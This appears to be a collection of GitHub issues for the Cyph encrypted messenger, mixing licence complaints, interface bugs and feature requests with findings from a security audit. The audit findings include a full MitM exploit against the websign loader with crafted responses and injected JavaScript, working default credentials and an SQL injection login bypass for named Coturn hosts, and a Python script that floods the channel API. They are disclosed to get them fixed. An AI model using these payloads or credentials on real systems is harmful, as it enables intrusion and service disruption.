I would like to submit some pull requests to improve the accessibility of Cyph. Sadly, the licence does not make that possible.

Specifically:

"Reference use" means use of the software within your company as a reference, in read only form, for the sole purposes of debugging your products, maintaining your products, or enhancing the interoperability of your products with the software, and specifically excludes the right to distribute the software outside of your company.

• "Read Only Form" - if I make a fork on GitHub, or locally, my copy of the source will be writeable. Indeed, I will need to write to it in order to submit a PR.
• Improving accessibility is not related to debugging, maintenance, or interoperability. I do not have any products.
• If I create a fork on GitHub, I will be distributing the code.
• I am not a company, nor do I work for a company.

Cyph looks like an excellent project, but the source code doesn't permit anyone to contribute fixes.

Please can you relicense the code under an OSI approved licence?

Can we have it?

Uploading a folder with some files to the storage is painful in several ways:

• I have to confirm the upload of every single file. That's annoying.
• Pressing Cancel just proceeds to the next file. No way to cancel the complete upload.
• All files are being created without the folder context.

It would be nice if the File manager handling could be improved.

Currently redirects to an "Unsupported browser" page

On one machine we have sound and on the other no sound. On the machine with no sound there is a spinning circle. We can send video from the machine with no sound to the other machine. Text messages work in both directions.

A MITM attacker with access to message cipher-texts can manipulate their order. The attacker can thus drop messages (shown below) and inject them into the conversation
later or potentially not at all.

Messages have IDs that have to increase in steps of 1 (checked in castle.ts:receive()), but those are not protected by end-to-end cryptography and can therefore be manipulated by an attacker. (Also, if the attacker is manipulating responses, he has to recalculate an MD5 checksum, but that is no problem either.)

Fig.: Example view for a message reordering controlled via MITM

Cyph prevents an attacker from forwarding a message to the recipient multiple times by checking whether a second, inner message ID has been seen yet in session.ts:receiveHandler(), but the inner ID is not checked against message ordering attacks.

It is recommended to validate that the inner IDs increase in steps of 1 and drop the connection with an error message if this is not the case.

Steps to reproduce:

• create post
• click share

iOS 12.2

Testing in production

https://www.cyph.im/lib/bower_components/twemoji/36x36/1f61b.png fails to load from within a corporate network (connection reset). Could be a bug on my end or Google's end but need to verify.

The text on the sign up screen is completely unreadable.

The red on purple is physically painful to read

The default text doesn't have great contrast.

Even the un-focused text is impossible to read.

Hi Cyphers,

There is a problem on the official website's SSL / TLS certificate for the Chrome browser (maybe others as well).

If you browse to:

• https://cyph.ws/, you'll get a Chrome certificate error NET::ERR_SSL_PINNED_KEY_NOT_IN_CERT_CHAIN
• https://www.cyph.ws/, you'll see the app load for a short bit and then get directed to the non-www domain and get the issue described above

This is the part of the code that triggers the redirect on the www version.

/* Set pin on www subdomain on first use, then force naked domain */
if (location.host.indexOf('www.') === 0) {
	location.host	= location.host.replace('www.', '');
	return;
}

This only happens in incognito mode or on browsers that haven't been on cyph.ws before (fresh OSX installs).

My guess is that this is due to the HTTPS preload setup for cyph.ws:

https://hstspreload.org/?domain=cyph.ws

The certificated I get:

• normal mode (cached from HTTPS preload I guess), is valid from 30 August 2015 to 6 September 2017
• incognito (new certificate that is broken), is valid from 17 July 2017 (today!) to 9 September 2019

OS: OSX El Capitan 10.11.3 (15D21)
Browser: Chrome Version 59.0.3071.115 (Official Build) (64-bit)

The document describing the Castle messaging protocol claims:

Note that voice/video is equally quantum-safe, as WebRTC’s DTLS key exchange is encrypted by Castle

However, the messages Castle encrypts merely contain the fingerprints of public keys used in the DTLS connection. The browser then does a TLS handshake directly over the network, authenticated using the exchanged fingerprints, and in the case of Google Chrome, the public keys that are authenticated using the fingerprints are 1024-bit RSA keys.

Between modern browsers, an ECDHE ciphersuite is then negotiated, so breaking the 1024-bit RSA key after the handshake has been completed does not allow an attacker to decrypt the exchanged data, but an attacker with the ability to break ECDH would be able to decrypt the data.

Because ECDH is not secure against quantum computing attacks, a future attacker with access to a quantum computer would be able to break the DTLS layer and therefore be able to decrypt voice and video data.

Hello,
On my 13" macbook the pricing page items looks like this:

I think maybe there should be some media queries for this one...?

Upon testing the environment where Cyph.im is currently deployed, it was noticed that one of the servers is exposing a MySQL database on port 3306. While this is not optimal, it was further discovered, that the credentials for logging in have not changed after installation - allowing an attacker to log in with default credentials and get control over database content and the file-system.

Tested and working credentials:

user:turn 
password: turn

Default credentials in docs:
https://code.google.com/p/coturn/source/browse/trunk/INSTALL?r=826#952

It is highly recommended to change the default credentials and use a strong username and password combination. It is further recommended to prohibit the database from allowing arbitrary external connections. By doing so, the attack can be fully mitigated.

The first messages of both peers in a Cyph connection use the same key and an all-zero nonce, see the constructor of CastleCore:

this.handlers.send(
  CastleCore.sodium.crypto_secretbox_easy(
    publicKeySet,
    new Uint8Array(
      CastleCore.sodium.crypto_secretbox_NONCEBYTES
    ),
    this.sharedSecret,
    'base64'
  )
);

This causes encryption to happen with the same keystream and violates the security requirements of the MAC. Because public NTRU keys have some structure, this is visible starting at the 48th byte of the base64-decoded ciphertext (16 bytes MAC, 32 bytes curve25519 pubkey):

Peer A: 69fb789cfdf344fd4ba2b8cfe7707e2d82e13b8df53ed0512e[...]
Peer B: 69fb789cfdb01130bc2f217e081308f66aa47a4e08f3d38c9a[...]

According to the NaCl documentation, “Authenticators for two messages under the same key should be expected to reveal enough information to allow forgeries of authenticators on other messages”, which would mean that the attacker could compute valid MACs on arbitrarily modified ciphertexts, allowing him to flip bits in the public keys of both peers in an attempt to weaken them. (However, being able to flip bits in a Curve25519 public key would probably be rather useless because every possible 32 byte value is a valid public key.)

It is recommended to modify the protocol to use a random nonce for the first message.

details forthcoming.

The Linux Snap distribution doesn't ask for permission to use the webcam when attempting to add a new device. When you click to add via a QR code, the center box never shows the camera image and the app doesn't ask for permissions.

Seems there's no way to get around the login if you've forgotten the password.

Would love to get back into my account, but I have zero options for that...

Firebase rules are not compiled because they reference a non existing variable $DOMAIN.
From what I saw it occurred due to this commit.
It looks like the variable $namespace in the hierarchy should be replaced with $DOMAIN.

Hi,
Just a quick heads-up. While I find cyph so far very user-friendly, congrats for that, I found it annoying not to be able to copy-paste the master key. Even worse, because I had to inspect the site's DOM content to end up copy pasting it, I copied it with white space before and after, couldn't find why quickly skimming the code.

Suggestion: let us copy/paste, add a copy button, and make sure there's no white space in the DOM component wrapping the key.

Although you mention here to put it into a file or on a cloud storage, not even mentioning it should be encrypted, and not in plain text, you mention "don't store it into a password manager". Why so? I don't think this is right. A password manager has its flaws, but it is orders of magnitude more secure and adapted to store a master key than "a file" on a computer.

The installation in Debian Bookworm is stuck at the installation of Composer packages, continually looping.

bacon/bacon-qr-code_ suggests:
 - ext-imagick: to generate QR code images

cypht-org/cypht suggests:
 - ext-redis: To use Redis for caching, this needs to be installed
 - ext-memcached: To use Memcached for caching, this needs to be installed
 - ext-gnupg: To use the PGP module set, this needs to be installed
 - ext-imagick: To use 2fa, this needs to be installed for the QR code display

ezyang/htmlpurifier suggests:
 - cerdic/css-tidy: If you want to use the filter 'Filter.ExtractStyleBlocks'.
 - ext-tidy: Used for pretty-printing HTML

league/commonmark suggests:
 - symfony/yaml: v2.3+ required if using the Front Matter extension

paragonie/random_compat suggests:
 - ext-libsodium: Provides a modern crypto API that can be used to generate random bytes.

phpunit/phpunit suggests:
 - ext-soap: To be able to generate mocks based on WSDL files
 - ext-xdebug: PHP extension that provides line coverage as well as branch and path coverage

Similar to the issue reported in CY-01-008, the admin interface of the Coturn server software is exposed to the Internet and can be accessed with default credentials.

Tested and working credentials:

user:bayaz
password: magi

Default credentials in docs:
https://code.google.com/p/coturn/wiki/CoturnConfig#Coturn_installation

Affected Installations:

• https://ice.cyph.com:3478/
• https://ice.cyph.com:3479/
• https://ice.cyph.com:5349/
• https://ice.cyph.com:5350/

It is highly recommended to change the default credentials and use a strong username and password combination. It is further recommended to prohibit the admin panel from allowing arbitrary external connections for access. By doing so, the attack can be fully mitigated.

Hi,

How can someone report a security issue? This is my 3rd attempt to do it. I tried email, submit a bug ticket, and now here. So far no response to the rest.

I would stay away from putting it here publicly, unless no one comes back to me.

Csaba

I appreciate that you write at https://www.cyph.com/blog/open-source that it is not considered Free Software. Could you please also add that it is not considered open source according to the Open Source Definition (https://opensource.org/docs/osd)?

There are multiple issues with the websign mechanism that, when combined, allow an attacker to completely bypass the websign scheme if he can deliver malicious code from https://www.cyph.im/.

Every time Cyph is loaded, the manifest is re-fetched over the network despite its caching headers. This behavior was observed in Chrome and Firefox Nightly. This allows an attacker to remove items, such as scripts required for websign to work, from the manifest.

Nothing prevents requests to nonexistent files from going through to the network. This means that a MitM attacker can use another website to load https://www.cyph.im/attack in an iframe, then replace the server’s 404 response for /attack with his own response.

The service worker actually has no effect since its scope is /websign/, but the document is loaded from /. However, even if it did work, this attack should still work because the attacker can replace the service worker with a different one.

This can be exploited as follows:

Somehow cause a navigation to https://www.cyph.im/attack, e.g. using an iframe. The browser will send requests for that page - reply to each one with this:

HTTP/1.1 200 OK
Content-Type: text/html
Connection: keep-alive

<html manifest="websign/appcache.appcache">
<img src="websign/js/crypto.js">
<script>
navigator.serviceWorker.getRegistration('/websign/').then(function(reg){reg.unregister()})
setTimeout(function(){location.reload(true)}, 20000)
</script>
</html>

Whenever the manifest is requested, reply with this - note the missing js/crypto.js entry:

HTTP/1.1 200 OK
Server: nginx
Connection: keep-alive

CACHE MANIFEST

CACHE:
../
css/websign.css
js/keys.js
js/sha256.js
js/workerhelper.js
lib/nacl.js
appcache.appcache
manifest.json
serviceworker.js

NETWORK:
*

Whenever the file js/crypto.js is requested, reply with this:

HTTP/1.1 200 OK
Server: nginx
Connection: keep-alive

if (!('crypto' in self) && 'msCrypto' in self) {
  self['crypto']  = self['msCrypto'];
}

if (!(
  'crypto' in self &&
  'getRandomValues' in self['crypto'] &&
  'Worker' in self &&
  'history' in self &&
  'pushState' in self['history'] &&
  'replaceState' in self['history'] &&
  'localStorage' in self
)) {
  location.pathname = '/unsupportedbrowser';
}

if (!('subtle' in crypto) && 'webkitSubtle' in crypto) {
  crypto.subtle = crypto['webkitSubtle'];
}

/* nuke warning stuff */
var realLocalStorage = localStorage;
window.__defineGetter__('localStorage', function(){
  return {webSignBootHashWhitelist:'{'}
})
/* show that we succeeded */
setTimeout(function(){
  var ifr = document.createElement('iframe');
  document.body.appendChild(ifr);
  ifr.outerHTML = '<iframe style="position:absolute;top:0px;left:0px;width:100%;height:100%;z-index:10000" src="https://html5sec.org/" width="100%" height="100%" border=0></iframe>';
},1000)

When /attack is loaded for the first time, the new manifest hasn’t taken effect yet and a cached version of js/crypto.js is loaded. After the location.reload(true) call, the page loads under the new manifest (and all future loads of the main Cyph page will do so as well), so js/crypto.js isn’t cached through a manifest anymore, it’s just in the normal browser cache. Because location.reload(true) bypasses the browser cache, a new copy of js/crypto.js is loaded over the network.

Now, when the user navigates to https://www.cyph.im/ for the next time, js/crypto.js isn’t cached anywhere anymore and is therefore reloaded over the network, allowing the attacker to run arbitrary JS code on the websign page.

Straightforward defenses against these issues are: Move all the websign code into one big standalone HTML file, thereby preventing attacks that alter the manifest (it does not seem possible to alter the manifest in such a way that the main page isn’t cached anymore). Move the service worker into the root directory, thereby changing its scope to /. Block requests to unknown resources in the service worker.

However, these fixes / mitigations would not change that the websign code completely relies on features intended to provide better performance and availability for security purposes. This should be avoided if possible because new features might destroy the security provided by these mechanisms and because the browser might alter its behavior for performance reasons (e.g. by deleting cached data because the cache is full).

It is recommended to rely on a mechanism designed for security as primary defense against attacks. For example, it would be possible to rotate the server’s private SSL key daily or more often while using Public Key Pinning, locking the server and any potential attackers out of the https://www.cyph.im/ origin. (Browsers may delete pins after some time - the RFC suggests 60 days -, so it would be a good idea to make a dummy request every time Cyph is loaded to re-set the pin if it expired.) Most Certificate Authorities charge for every new certificate, but after Let’s Encrypt has launched in September, it should be possible to automatically obtain new certificates for free.

Upon having a closer look at the sources used for the webserver hosting the admin login mentioned in CY-01-009, it was found, that the code is plagued by several SQL injection vulnerabilities. Those would enable an attacker to get entry to the admin area even if the password would have been changed earlier.

The attack can be exploited quite easily by simply entering the following strings into the form-fields for username and password:

PoC:

user:         a' AND 1=0 UNION SELECT 'a','b
password:     b

Affected Code:
https://code.google.com/p/coturn/source/browse/trunk/src/apps/relay/dbdrivers/dbd_mysql.c?r=826#1099

Affected Installations:

• https://ice.cyph.com:3478/
• https://ice.cyph.com:3479/
• https://ice.cyph.com:5349/
• https://ice.cyph.com:5350/

Note that the same code also exists in the files dbd_sqlite and dbd_pqsql. It is highly recommended to remove that vulnerable interface and get in touch with the maintainers of that software. This is a critical issue that affects almost any servers running this software.

Hi,
I'd love to see your presentations at DC and Blackhat. Would you be willing to link me?

Is there an API available to, for example, upload or sync local files with ones in the Cyph vault?

current behavior

Lock Screen PINs are currently required to be exactly 4 digits

desired behavior

Support for arbitrary-length 4+ digit Lock Screen PINs

reasoning

4-digit PINs have been generally considered less-than-secure for a while now. Smartphones moved from fixed 4-digit unlock PINs years ago for this reason, instead supporting reasonably large 4+ digit PINs.

To allow users to format messages, Cyph supports Github-style Markdown and uses a JavaScript library to convert it to HTML for display in the chat window.

It was found, that links and anchors can be used as well and that currently a black-list is used to prevent JavaScript injection attacks. It is however possible to use arbitrary URI schemes that might cause problems depending on the device and context activated in.

It is recommended to switch from a black-list based approach that is in use right now to a white-list that only permits links to HTTP, HTTPS and FTP resources to be turned into HTML. It is further recommended to solve the problem by using a DOMPurify hook and validate any URI scheme before rendering the HTML in the chat window.

Hey there, back for round 2 :)

On July 2nd [0], you agreed to remove the words "Open Source" from your website (even though the blog post was still named "Open Source"). The reason for this being that Cyph is simply not Open Source and stating so would be deceiving users.

It seems those words have accidentally been put back on the website! I'd like to once again request those words to be taken down, they are still deceiving as Cyph has nt changed license and is still very much not Open Source.

[0] #59

@rysiekpl

Random IDs in Cyph links are 14 characters long and are constructed from a set of 60 characters. Therefore, they could have a strength of log2(6014)≈82.70 bits. However, the characters are picked using the following code, where n is a random integer in the range 0..255:

Config.guidAddressSpace[n % Config.guidAddressSpace.length]

Because 60 isn’t a divisor of 256, some characters are more likely to occur than others: While most characters occur with a probability of floor(256/60)/256 = 4/256, the last 256%60=16 characters occur with a chance of 5/256. Therefore, the strength that the random ID actually has is as follows:

14 * -(44 * 4/256 * log2(4/256) + 16 * 5/256 * log2(5/256)) = 82.59 bits.

Although a difference of 0.10 bits of security is not a practical problem, it would be preferable to use the randombytes_uniform() helper of libsodium to pick a more uniformly random number.

As a user, I'd like to run Cyph from a standalone Linux binary / AppImage.

Snaps are not always the best way to distribute software on Linux, and come with their own set of complications - some of which make deploying them impossible.

If possible, a self-contained process would be far easier to install and deploy.

Hi, first of all, amazing work! I'm a TypeScript developer that's very interested in using your code for your novel TypeScript crypto methods under the potassium directory for a project I'm working on: arcjet

However, I'm unsure the license, or intent of maintenance, or expectation of community contributions for this code. My intent certainly isn't to appropriate your code by any means.

Regardless, I might put together a potassium package for you guys, if you don't mind. I'm considering tearing out the NativeCrypto stuff, which isn't that relevant to the Node.js or browser community, and using it and maintaining it for the purpose of hashing passwords and signing data, and various other incredibly useful post-quantum, future-oriented crypto methods.

I might also refactor it in such a way that it uses async/await instead of the older syntax you're using, and maybe add some error handling and tests, where useful.

So, I hope all this is okay, and I encourage you to keep developing in public, since that's awesome and wonderful.

I saw in your codebase that you were waiting for a resolution to a Helia issue to adopt Helia, but we never got a response from you on ipfs/helia#187

Is there something we can do to assist? Did Alex's comment at ipfs/helia#187 (comment) not help you at?

In the current state of the application, all of the links that a user can send to another user via Cyph.im are missing “noreferrer” attributes. This might cause minor information leaks but mostly introduced the risk for unwanted navigation of the Cyph.im window from the opened window by using window.opener.location.

An attacker could maliciously prepare the linked page or use a MitM attack to inject JavaScript into the linked page upon navigating it and thereby gain limited control over the Cyph.im window. The application already protects itself from unwanted navigation by displaying a modal dialog before leaving the page.

It is however recommended to completely minimize the attack surface by applying all displayed links with the rel="noreferrer" attributes and by using a meta element that sets the referrer policy to “none”. This both has the effect of not only hiding the referrer but setting window.opener for the linked page to be null instead of a window object.

The padding Cyph is using in some parts of the application appears to be useless and, alas stated otherwise doesn’t fulfil any security purposes. In the file castlemessageinner.ts, a comment states:

Also transparently adds padding to ensure that the same message sent between key ratchets won't yield the same cyphertext.

However, the only purpose the random padding actually fulfils is hiding the real length of the ciphertext.

crypto_box and crypto_secretbox internally both use the Salsa20 stream cipher to encrypt data. (In fact, crypto_box is a wrapper around crypto_secretbox that derives the symmetric key using asymmetric crypto.) Because messages are encrypted with random nonces in both layers of the encryption, every message is encrypted using a different keystream, so encrypting the same message twice already generates completely different ciphertexts. If the keystreams were reused because of a reused nonce, the padding would not protect against keystream reuse attacks.

It is recommended to continue using random padding to hide the exact lengths of messages (especially for very short messages like “yes” and “no”, precise message lengths might be usable for an attacker), but the padding can be simplified: It is not necessary to add padding both to start and end, adding it to one of the two ends is sufficient. It is not necessary to always add 100 bytes of padding - just adding a random amount of bytes would fulfil the same purpose.

Cyph clients have a shared secret with 82.59 bits of entropy (see CY-01-004). However, they communicate half of that secret to the server as a connection identifier, leaving only 41.30 bits of entropy and an effective search space of 41.35 bits. From the shared secret, a shared key is generated using scrypt - but scrypt is invoked with the weakest possible parameters:

this.sharedSecret = CastleCore.sodium.crypto_pwhash_scryptsalsa208sha256(
  sharedSecret,
  new Uint8Array(
    CastleCore.sodium.crypto_pwhash_scryptsalsa208sha256_SALTBYTES
  ),
  0,
  0,
  CastleCore.sodium.crypto_secretbox_KEYBYTES
);

Passing 0 as operations limit and memory limit causes pickparams() in the scrypt implementation to choose N=2, p=512, r=8. With these parameters, scrypt performs two PBKDF2 invocations with iteration count 1 and 512*2*16=16384=214 rounds of the Salsa20/8 core.

This means that computing all possible keys for a given 7-byte connection identifier takes 214*241.35=255.35 invocations of the Salsa20/8 core plus some overhead. However, they can’t be precomputed because the connection identifier acts as a salt - if an attacker wants to perform a MitM attack on the key agreement and read messages in plaintext without breaking the asymmetric crypto, he needs to break the key between the moment the first party believes the second party has clicked the link (which can be faked by the server) and the time the second party actually wants to start communicating. This gives the attacker a few minutes at most.

The following is a rough estimate of the hardware costs required for MitM-ing targeted connections with a 5% success rate, assuming that it takes 5 minutes for the second party to open the cyph (or the users accept a delay of 5 minutes) and targeted connections are at least 5 minutes apart. (The success rate is linear in time, so if the user clicks within one minute, the success rate is still 1%.)

Colin Percival’s presentation on scrypt gives estimates of the cost of implementing various cryptographic functions, including the Salsa20/8 core, in hardware. Using these numbers, leaving aside the storage requirements (because scrypt is tuned to only need minimal storage here, that shouldn’t have a big effect), it can be calculated:

0.1$/(mm^2) * 5 micrometers^2 * 24000 * (2^55.35 / (2000 Mb/s / 64 bytes) / (100 minutes)) = $23510

It should be noted that this only a very rough estimate, both for the reasons pointed out in the presentation (the numbers are from 2002, this does not include the cost of other ASIC hardware parts, power costs are not included, ...) and because the price of memory and components outside the Salsa20/8 core are not included.

Still, this gives a rough idea of the difficulty of breaking this scheme. It is recommended to increase the length of the secret part of the connection identifier, ideally to 20 characters. This length could be reduced by a few characters after tuning scrypt differently.

• HPKP key rotation (to deny server availability after first use)
• Block paths outside whitelist in ServiceWorker
• Load Web fonts, video, and Twemoji images from www.cyph.com (or cyphdbyhiddenbhs.onion/)

The API (default/api.go) is used to register and connect to a channel. The Cyph ID and the channel description is stored in the appengine memcache. The length of the Cyph ID has to be 7 characters long, but the channel description has no restriction. Though a memcache entry can only be up to 1MB. A channel description expires after 48 hours. Depending on whether Cyph is running on shared or dedicated memcache, this can have different implications.

When a channel is created the channel description is stored in the memcache. And this value can only be accessed once from the person who wants to connect to this channel. But if in the meantime the channel key is evicted from memcache due to the memcache being full, the other person cannot connect to this channel anymore. This is a race against the time, but with 1MB of fake channel descriptions, depending on the maximum memcache size and if it’s running on shared or dedicated memcache, this might be very easy to achieve.

If Cyph is running on dedicated memcache, 1GB of data costs $0.06 per hour. This means with the expiration time of 48 hours, 1GB of fake channels cost $2.88. ~35GB of memcache data costs roughly $100 over 48 hours. This can be achieved with only 35.000 requests. The default maximum for dedicated memcache is 100GB, which would cost $288 over 48h with only 100.000 requests.

Simplified PoC:

import requests, random
def post(data):
    r = random.randint(1111111,9999999)
    url = "https://api.cyph.com/channels/"+str(r) 
    requests.post(url, data=data)
while True:
    post({"channelDescriptor":"A"*(1048500)})

A similar financial issue exists for the appengine datastorage used with beta signups.
To mitigate this issue restricting the maximum size of the channel description to a few hundred bytes would make a cache eviction attack infeasible to perform.